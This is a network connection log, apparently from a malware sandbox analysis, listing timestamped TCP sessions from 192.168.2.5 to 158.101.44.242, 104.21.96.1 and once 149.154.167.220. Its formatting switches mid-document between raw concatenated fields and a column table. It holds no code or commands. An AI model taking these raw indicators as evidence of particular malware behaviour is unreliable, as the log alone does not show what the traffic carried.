                                                                                                                                                                    Mar 11, 2025 06:10:16.717744112 CET4971580192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:18.433254004 CET44349719104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:18.435569048 CET49719443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:18.435590029 CET44349719104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:18.796195030 CET8049716158.101.44.242192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:18.799894094 CET4971680192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:18.804873943 CET8049716158.101.44.242192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:18.915431976 CET44349719104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:18.915515900 CET44349719104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:18.915601015 CET49719443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:18.916363955 CET49719443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:18.923038960 CET4972180192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:18.927947044 CET8049721158.101.44.242192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:18.928029060 CET4972180192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:18.928136110 CET4972180192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:18.932892084 CET8049721158.101.44.242192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:24.057415009 CET8049716158.101.44.242192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:24.094259977 CET49723443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:24.094338894 CET44349723104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:24.095242977 CET49723443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:24.101233006 CET49723443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:24.101257086 CET44349723104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:24.107212067 CET4971680192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:24.490513086 CET8049721158.101.44.242192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:24.492300987 CET49724443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:24.492351055 CET44349724104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:24.492444038 CET49724443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:24.492710114 CET49724443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:24.492716074 CET44349724104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:24.544517040 CET4972180192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:25.970891953 CET44349723104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:25.971016884 CET49723443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:25.972632885 CET49723443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:25.972647905 CET44349723104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:25.972912073 CET44349723104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:26.013284922 CET49723443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:26.020716906 CET49723443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:26.068326950 CET44349723104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:26.207742929 CET44349724104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:26.209573030 CET49724443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:26.209595919 CET44349724104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:26.448091030 CET44349723104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:26.448158026 CET44349723104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:26.448225021 CET49723443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:26.451183081 CET49723443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:26.454727888 CET4971680192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:26.459640980 CET8049716158.101.44.242192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:26.709454060 CET44349724104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:26.709635019 CET44349724104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:26.710135937 CET49724443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:26.710135937 CET49724443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:26.713639021 CET4972180192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:26.714632034 CET4972580192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:26.718704939 CET8049721158.101.44.242192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:26.718750954 CET4972180192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:26.719412088 CET8049725158.101.44.242192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:26.719482899 CET4972580192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:26.719578028 CET4972580192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:26.724317074 CET8049725158.101.44.242192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:27.801373005 CET8049716158.101.44.242192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:27.803348064 CET49726443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:27.803395033 CET44349726104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:27.803452015 CET49726443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:27.803725004 CET49726443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:27.803739071 CET44349726104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:27.857003927 CET4971680192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:28.659517050 CET8049725158.101.44.242192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:28.662779093 CET49727443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:28.662834883 CET44349727104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:28.662935972 CET49727443192.168.2.5104.21.96.1
Timestamp                            Source Port  Dest Port  Source IP       Dest IP
Mar 11, 2025 06:10:28.663168907 CET  49727        443        192.168.2.5     104.21.96.1
Mar 11, 2025 06:10:28.663182974 CET  443          49727      104.21.96.1     192.168.2.5
Mar 11, 2025 06:10:28.716413021 CET  49725        80         192.168.2.5     158.101.44.242
Mar 11, 2025 06:10:29.523813963 CET  443          49726      104.21.96.1     192.168.2.5
Mar 11, 2025 06:10:29.525787115 CET  49726        443        192.168.2.5     104.21.96.1
Mar 11, 2025 06:10:29.525830030 CET  443          49726      104.21.96.1     192.168.2.5
Mar 11, 2025 06:10:30.004548073 CET  443          49726      104.21.96.1     192.168.2.5
Mar 11, 2025 06:10:30.004611969 CET  443          49726      104.21.96.1     192.168.2.5
Mar 11, 2025 06:10:30.004674911 CET  49726        443        192.168.2.5     104.21.96.1
Mar 11, 2025 06:10:30.005197048 CET  49726        443        192.168.2.5     104.21.96.1
Mar 11, 2025 06:10:30.009097099 CET  49716        80         192.168.2.5     158.101.44.242
Mar 11, 2025 06:10:30.010252953 CET  49728        80         192.168.2.5     158.101.44.242
Mar 11, 2025 06:10:30.014256001 CET  80           49716      158.101.44.242  192.168.2.5
Mar 11, 2025 06:10:30.014348984 CET  49716        80         192.168.2.5     158.101.44.242
Mar 11, 2025 06:10:30.015130043 CET  80           49728      158.101.44.242  192.168.2.5
Mar 11, 2025 06:10:30.015218973 CET  49728        80         192.168.2.5     158.101.44.242
Mar 11, 2025 06:10:30.015328884 CET  49728        80         192.168.2.5     158.101.44.242
Mar 11, 2025 06:10:30.020148039 CET  80           49728      158.101.44.242  192.168.2.5
Mar 11, 2025 06:10:30.323795080 CET  443          49727      104.21.96.1     192.168.2.5
Mar 11, 2025 06:10:30.325453043 CET  49727        443        192.168.2.5     104.21.96.1
Mar 11, 2025 06:10:30.325485945 CET  443          49727      104.21.96.1     192.168.2.5
Mar 11, 2025 06:10:30.665066004 CET  80           49728      158.101.44.242  192.168.2.5
Mar 11, 2025 06:10:30.669235945 CET  49729        443        192.168.2.5     104.21.96.1
Mar 11, 2025 06:10:30.669292927 CET  443          49729      104.21.96.1     192.168.2.5
Mar 11, 2025 06:10:30.669374943 CET  49729        443        192.168.2.5     104.21.96.1
Mar 11, 2025 06:10:30.669650078 CET  49729        443        192.168.2.5     104.21.96.1
Mar 11, 2025 06:10:30.669662952 CET  443          49729      104.21.96.1     192.168.2.5
Mar 11, 2025 06:10:30.716397047 CET  49728        80         192.168.2.5     158.101.44.242
Mar 11, 2025 06:10:30.810040951 CET  443          49727      104.21.96.1     192.168.2.5
Mar 11, 2025 06:10:30.810132027 CET  443          49727      104.21.96.1     192.168.2.5
Mar 11, 2025 06:10:30.810201883 CET  49727        443        192.168.2.5     104.21.96.1
Mar 11, 2025 06:10:30.810945034 CET  49727        443        192.168.2.5     104.21.96.1
Mar 11, 2025 06:10:30.815278053 CET  49725        80         192.168.2.5     158.101.44.242
Mar 11, 2025 06:10:30.816453934 CET  49730        80         192.168.2.5     158.101.44.242
Mar 11, 2025 06:10:30.820391893 CET  80           49725      158.101.44.242  192.168.2.5
Mar 11, 2025 06:10:30.820466995 CET  49725        80         192.168.2.5     158.101.44.242
Mar 11, 2025 06:10:30.822271109 CET  80           49730      158.101.44.242  192.168.2.5
Mar 11, 2025 06:10:30.822390079 CET  49730        80         192.168.2.5     158.101.44.242
Mar 11, 2025 06:10:30.822541952 CET  49730        80         192.168.2.5     158.101.44.242
Mar 11, 2025 06:10:30.827383041 CET  80           49730      158.101.44.242  192.168.2.5
Mar 11, 2025 06:10:31.433689117 CET  80           49730      158.101.44.242  192.168.2.5
Mar 11, 2025 06:10:31.435121059 CET  49731        443        192.168.2.5     104.21.96.1
Mar 11, 2025 06:10:31.435180902 CET  443          49731      104.21.96.1     192.168.2.5
Mar 11, 2025 06:10:31.435383081 CET  49731        443        192.168.2.5     104.21.96.1
Mar 11, 2025 06:10:31.435709953 CET  49731        443        192.168.2.5     104.21.96.1
Mar 11, 2025 06:10:31.435728073 CET  443          49731      104.21.96.1     192.168.2.5
Mar 11, 2025 06:10:31.482038975 CET  49730        80         192.168.2.5     158.101.44.242
Mar 11, 2025 06:10:33.571739912 CET  443          49729      104.21.96.1     192.168.2.5
Mar 11, 2025 06:10:33.573477983 CET  49729        443        192.168.2.5     104.21.96.1
Mar 11, 2025 06:10:33.573510885 CET  443          49729      104.21.96.1     192.168.2.5
Mar 11, 2025 06:10:33.595948935 CET  443          49731      104.21.96.1     192.168.2.5
Mar 11, 2025 06:10:33.597489119 CET  49731        443        192.168.2.5     104.21.96.1
Mar 11, 2025 06:10:33.597522020 CET  443          49731      104.21.96.1     192.168.2.5
Mar 11, 2025 06:10:34.050415039 CET  443          49729      104.21.96.1     192.168.2.5
Mar 11, 2025 06:10:34.050478935 CET  443          49729      104.21.96.1     192.168.2.5
Mar 11, 2025 06:10:34.050540924 CET  49729        443        192.168.2.5     104.21.96.1
Mar 11, 2025 06:10:34.051345110 CET  49729        443        192.168.2.5     104.21.96.1
Mar 11, 2025 06:10:34.055862904 CET  49732        80         192.168.2.5     158.101.44.242
Mar 11, 2025 06:10:34.061263084 CET  80           49732      158.101.44.242  192.168.2.5
Mar 11, 2025 06:10:34.061330080 CET  49732        80         192.168.2.5     158.101.44.242
Mar 11, 2025 06:10:34.061528921 CET  49732        80         192.168.2.5     158.101.44.242
Mar 11, 2025 06:10:34.067306042 CET  80           49732      158.101.44.242  192.168.2.5
Mar 11, 2025 06:10:34.102574110 CET  443          49731      104.21.96.1     192.168.2.5
Mar 11, 2025 06:10:34.102634907 CET  443          49731      104.21.96.1     192.168.2.5
Mar 11, 2025 06:10:34.102735043 CET  49731        443        192.168.2.5     104.21.96.1
Mar 11, 2025 06:10:34.103251934 CET  49731        443        192.168.2.5     104.21.96.1
Mar 11, 2025 06:10:34.107259035 CET  49730        80         192.168.2.5     158.101.44.242
Mar 11, 2025 06:10:34.109204054 CET  49733        80         192.168.2.5     158.101.44.242
Mar 11, 2025 06:10:34.113286018 CET  80           49730      158.101.44.242  192.168.2.5
Mar 11, 2025 06:10:34.113337994 CET  49730        80         192.168.2.5     158.101.44.242
Mar 11, 2025 06:10:34.115147114 CET  80           49733      158.101.44.242  192.168.2.5
Mar 11, 2025 06:10:34.115268946 CET  49733        80         192.168.2.5     158.101.44.242
Mar 11, 2025 06:10:34.115523100 CET  49733        80         192.168.2.5     158.101.44.242
Mar 11, 2025 06:10:34.120488882 CET  80           49733      158.101.44.242  192.168.2.5
Mar 11, 2025 06:10:34.633016109 CET  80           49732      158.101.44.242  192.168.2.5
Mar 11, 2025 06:10:34.634454012 CET  49734        443        192.168.2.5     104.21.96.1
Mar 11, 2025 06:10:34.634507895 CET  443          49734      104.21.96.1     192.168.2.5
Mar 11, 2025 06:10:34.634660959 CET  49734        443        192.168.2.5     104.21.96.1
Mar 11, 2025 06:10:34.635020971 CET  49734        443        192.168.2.5     104.21.96.1
Mar 11, 2025 06:10:34.635036945 CET  443          49734      104.21.96.1     192.168.2.5
Mar 11, 2025 06:10:34.685179949 CET  49732        80         192.168.2.5     158.101.44.242
Mar 11, 2025 06:10:34.715038061 CET  80           49733      158.101.44.242  192.168.2.5
Mar 11, 2025 06:10:34.717171907 CET  49735        443        192.168.2.5     104.21.96.1
Mar 11, 2025 06:10:34.717212915 CET  443          49735      104.21.96.1     192.168.2.5
Mar 11, 2025 06:10:34.717284918 CET  49735        443        192.168.2.5     104.21.96.1
Mar 11, 2025 06:10:34.717713118 CET  49735        443        192.168.2.5     104.21.96.1
Mar 11, 2025 06:10:34.717725039 CET  443          49735      104.21.96.1     192.168.2.5
Mar 11, 2025 06:10:34.764244080 CET  49733        80         192.168.2.5     158.101.44.242
Mar 11, 2025 06:10:36.692977905 CET  443          49734      104.21.96.1     192.168.2.5
Mar 11, 2025 06:10:36.694638014 CET  49734        443        192.168.2.5     104.21.96.1
Mar 11, 2025 06:10:36.694674969 CET  443          49734      104.21.96.1     192.168.2.5
Mar 11, 2025 06:10:36.703741074 CET  443          49735      104.21.96.1     192.168.2.5
Mar 11, 2025 06:10:36.705287933 CET  49735        443        192.168.2.5     104.21.96.1
Mar 11, 2025 06:10:36.705378056 CET  443          49735      104.21.96.1     192.168.2.5
Mar 11, 2025 06:10:37.166501045 CET  443          49734      104.21.96.1     192.168.2.5
Mar 11, 2025 06:10:37.166577101 CET  443          49734      104.21.96.1     192.168.2.5
Mar 11, 2025 06:10:37.166621923 CET  49734        443        192.168.2.5     104.21.96.1
Mar 11, 2025 06:10:37.167105913 CET  49734        443        192.168.2.5     104.21.96.1
Mar 11, 2025 06:10:37.169821978 CET  443          49735      104.21.96.1     192.168.2.5
Mar 11, 2025 06:10:37.169982910 CET  443          49735      104.21.96.1     192.168.2.5
Mar 11, 2025 06:10:37.170315027 CET  49735        443        192.168.2.5     104.21.96.1
Mar 11, 2025 06:10:37.170538902 CET  49735        443        192.168.2.5     104.21.96.1
Mar 11, 2025 06:10:37.171906948 CET  49732        80         192.168.2.5     158.101.44.242
Mar 11, 2025 06:10:37.172130108 CET  49736        80         192.168.2.5     158.101.44.242
Mar 11, 2025 06:10:37.174561024 CET  49733        80         192.168.2.5     158.101.44.242
Mar 11, 2025 06:10:37.175118923 CET  49737        80         192.168.2.5     158.101.44.242
Mar 11, 2025 06:10:37.176990986 CET  80           49732      158.101.44.242  192.168.2.5
Mar 11, 2025 06:10:37.177011013 CET  80           49736      158.101.44.242  192.168.2.5
Mar 11, 2025 06:10:37.177062035 CET  49732        80         192.168.2.5     158.101.44.242
Mar 11, 2025 06:10:37.177144051 CET  49736        80         192.168.2.5     158.101.44.242
Mar 11, 2025 06:10:37.177220106 CET  49736        80         192.168.2.5     158.101.44.242
Mar 11, 2025 06:10:37.179534912 CET  80           49733      158.101.44.242  192.168.2.5
Mar 11, 2025 06:10:37.179588079 CET  49733        80         192.168.2.5     158.101.44.242
Mar 11, 2025 06:10:37.179954052 CET  80           49737      158.101.44.242  192.168.2.5
Mar 11, 2025 06:10:37.180053949 CET  49737        80         192.168.2.5     158.101.44.242
Mar 11, 2025 06:10:37.180102110 CET  49737        80         192.168.2.5     158.101.44.242
Mar 11, 2025 06:10:37.182015896 CET  80           49736      158.101.44.242  192.168.2.5
Mar 11, 2025 06:10:37.184938908 CET  80           49737      158.101.44.242  192.168.2.5
Mar 11, 2025 06:10:37.753390074 CET  80           49737      158.101.44.242  192.168.2.5
Mar 11, 2025 06:10:37.754750967 CET  49738        443        192.168.2.5     104.21.96.1
Mar 11, 2025 06:10:37.754806995 CET  443          49738      104.21.96.1     192.168.2.5
Mar 11, 2025 06:10:37.754900932 CET  49738        443        192.168.2.5     104.21.96.1
Mar 11, 2025 06:10:37.755168915 CET  49738        443        192.168.2.5     104.21.96.1
Mar 11, 2025 06:10:37.755182028 CET  443          49738      104.21.96.1     192.168.2.5
Mar 11, 2025 06:10:37.769226074 CET  80           49736      158.101.44.242  192.168.2.5
Mar 11, 2025 06:10:37.770575047 CET  49739        443        192.168.2.5     104.21.96.1
Mar 11, 2025 06:10:37.770620108 CET  443          49739      104.21.96.1     192.168.2.5
Mar 11, 2025 06:10:37.770802021 CET  49739        443        192.168.2.5     104.21.96.1
Mar 11, 2025 06:10:37.771034956 CET  49739        443        192.168.2.5     104.21.96.1
Mar 11, 2025 06:10:37.771047115 CET  443          49739      104.21.96.1     192.168.2.5
Mar 11, 2025 06:10:37.794564962 CET  49737        80         192.168.2.5     158.101.44.242
Mar 11, 2025 06:10:37.810261965 CET  49736        80         192.168.2.5     158.101.44.242
Mar 11, 2025 06:10:39.583549023 CET  443          49739      104.21.96.1     192.168.2.5
Mar 11, 2025 06:10:39.583767891 CET  443          49738      104.21.96.1     192.168.2.5
Mar 11, 2025 06:10:39.585258007 CET  49738        443        192.168.2.5     104.21.96.1
Mar 11, 2025 06:10:39.585273027 CET  443          49738      104.21.96.1     192.168.2.5
Mar 11, 2025 06:10:39.586363077 CET  49739        443        192.168.2.5     104.21.96.1
Mar 11, 2025 06:10:39.586388111 CET  443          49739      104.21.96.1     192.168.2.5
Mar 11, 2025 06:10:40.120002031 CET  443          49738      104.21.96.1     192.168.2.5
Mar 11, 2025 06:10:40.120014906 CET  443          49739      104.21.96.1     192.168.2.5
Mar 11, 2025 06:10:40.120080948 CET  443          49738      104.21.96.1     192.168.2.5
Mar 11, 2025 06:10:40.120093107 CET  443          49739      104.21.96.1     192.168.2.5
Mar 11, 2025 06:10:40.120232105 CET  49738        443        192.168.2.5     104.21.96.1
Mar 11, 2025 06:10:40.120240927 CET  49739        443        192.168.2.5     104.21.96.1
Mar 11, 2025 06:10:40.120704889 CET  49739        443        192.168.2.5     104.21.96.1
Mar 11, 2025 06:10:40.120716095 CET  49738        443        192.168.2.5     104.21.96.1
Mar 11, 2025 06:10:40.124272108 CET  49737        80         192.168.2.5     158.101.44.242
Mar 11, 2025 06:10:40.124926090 CET  49736        80         192.168.2.5     158.101.44.242
Mar 11, 2025 06:10:40.124926090 CET  49740        80         192.168.2.5     158.101.44.242
Mar 11, 2025 06:10:40.124988079 CET  49741        80         192.168.2.5     158.101.44.242
Mar 11, 2025 06:10:40.129280090 CET  80           49737      158.101.44.242  192.168.2.5
Mar 11, 2025 06:10:40.129403114 CET  49737        80         192.168.2.5     158.101.44.242
Mar 11, 2025 06:10:40.129883051 CET  80           49736      158.101.44.242  192.168.2.5
Mar 11, 2025 06:10:40.129908085 CET  80           49740      158.101.44.242  192.168.2.5
Mar 11, 2025 06:10:40.129920959 CET  80           49741      158.101.44.242  192.168.2.5
Mar 11, 2025 06:10:40.129940987 CET  49736        80         192.168.2.5     158.101.44.242
Mar 11, 2025 06:10:40.129985094 CET  49740        80         192.168.2.5     158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:40.130079985 CET4974080192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:40.130079985 CET4974180192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:40.130145073 CET4974180192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:40.134824038 CET8049740158.101.44.242192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:40.134917021 CET8049741158.101.44.242192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:40.711698055 CET8049740158.101.44.242192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:40.713227034 CET49742443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:40.713267088 CET44349742104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:40.713352919 CET49742443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:40.713639975 CET49742443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:40.713644981 CET8049741158.101.44.242192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:40.713650942 CET44349742104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:40.714786053 CET49743443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:40.714848042 CET44349743104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:40.714910984 CET49743443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:40.715167999 CET49743443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:40.715188980 CET44349743104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:40.763462067 CET4974080192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:40.766407013 CET4974180192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:42.491727114 CET44349742104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:42.493666887 CET49742443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:42.493684053 CET44349742104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:42.543528080 CET44349743104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:42.545352936 CET49743443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:42.545372009 CET44349743104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:42.980353117 CET44349742104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:42.980429888 CET44349742104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:42.980535030 CET49742443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:42.981141090 CET49742443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:42.985301018 CET4974080192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:42.986653090 CET4974480192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:43.200967073 CET8049744158.101.44.242192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:43.200983047 CET8049740158.101.44.242192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:43.201069117 CET4974080192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:43.201098919 CET44349743104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:43.201092958 CET4974480192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:43.201181889 CET44349743104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:43.201225996 CET49743443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:43.201354027 CET4974480192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:43.201726913 CET49743443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:43.206269026 CET8049744158.101.44.242192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:43.353679895 CET4974180192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:43.358933926 CET8049741158.101.44.242192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:43.359015942 CET4974180192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:43.362276077 CET49745443192.168.2.5149.154.167.220
                                                                                                                                                                    Mar 11, 2025 06:10:43.362337112 CET44349745149.154.167.220192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:43.362431049 CET49745443192.168.2.5149.154.167.220
                                                                                                                                                                    Mar 11, 2025 06:10:43.362896919 CET49745443192.168.2.5149.154.167.220
                                                                                                                                                                    Mar 11, 2025 06:10:43.362910032 CET44349745149.154.167.220192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:43.793822050 CET8049744158.101.44.242192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:43.795388937 CET49746443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:43.795438051 CET44349746104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:43.795530081 CET49746443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:43.795797110 CET49746443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:43.795811892 CET44349746104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:43.841443062 CET4974480192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:45.210735083 CET44349745149.154.167.220192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:45.210974932 CET49745443192.168.2.5149.154.167.220
                                                                                                                                                                    Mar 11, 2025 06:10:45.212857962 CET49745443192.168.2.5149.154.167.220
                                                                                                                                                                    Mar 11, 2025 06:10:45.212867975 CET44349745149.154.167.220192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:45.213140011 CET44349745149.154.167.220192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:45.214550018 CET49745443192.168.2.5149.154.167.220
                                                                                                                                                                    Mar 11, 2025 06:10:45.260332108 CET44349745149.154.167.220192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:45.625278950 CET44349746104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:45.626995087 CET49746443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:45.627031088 CET44349746104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:45.741005898 CET44349745149.154.167.220192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:45.741099119 CET44349745149.154.167.220192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:45.741183996 CET49745443192.168.2.5149.154.167.220
                                                                                                                                                                    Mar 11, 2025 06:10:45.762387991 CET49745443192.168.2.5149.154.167.220
                                                                                                                                                                    Mar 11, 2025 06:10:46.100775957 CET44349746104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:46.100856066 CET44349746104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:46.100958109 CET49746443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:46.101470947 CET49746443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:46.104734898 CET4974480192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:46.105848074 CET4974780192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:46.109833002 CET8049744158.101.44.242192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:46.109918118 CET4974480192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:46.110699892 CET8049747158.101.44.242192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:46.110789061 CET4974780192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:46.110882044 CET4974780192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:46.115700960 CET8049747158.101.44.242192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:46.695955992 CET8049747158.101.44.242192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:46.702601910 CET49748443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:46.702665091 CET44349748104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:46.702729940 CET49748443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:46.703011990 CET49748443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:46.703026056 CET44349748104.21.96.1192.168.2.5
